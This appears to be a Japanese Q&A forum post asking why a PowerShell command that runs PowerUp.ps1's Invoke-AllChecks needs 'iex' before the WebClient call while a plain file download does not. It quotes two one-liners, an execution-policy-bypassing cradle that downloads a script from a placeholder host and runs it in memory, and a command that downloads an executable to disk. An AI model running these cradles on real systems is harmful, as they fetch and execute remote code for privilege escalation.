# powershellを使ったファイルダウンロードについて

Tags: powershell

powershellを使ってファイルを読み取り、Invoke-AllChecks関数を実行する場合、(new-object system.net.webclient)の前にiexを指定しますが（1つ目のコード）、ファイルをダウンロードする場合は、(new-object system.net.webclient)の前にiexを指定しなくてもよいのはなぜでしょうか。

```
powershell -nop -exec bypass -c "iex(new-object system.net.webclient).downloadstring('http://<IP>:<Port>/PowerUp.ps1'); Invoke-AllChecks"
```

```
powershell -c (new-object system.net.webclient).downloadfile('http://<IP>:<Port>/<Filename>.exe','C:\<Path>\<Filename>.exe')
```

Comment: 過去の質問について、解決したものは[回答の承認](https://ja.meta.stackoverflow.com/questions/1735/)をお願いします。解決していないものは何が不足しているのか補足してください。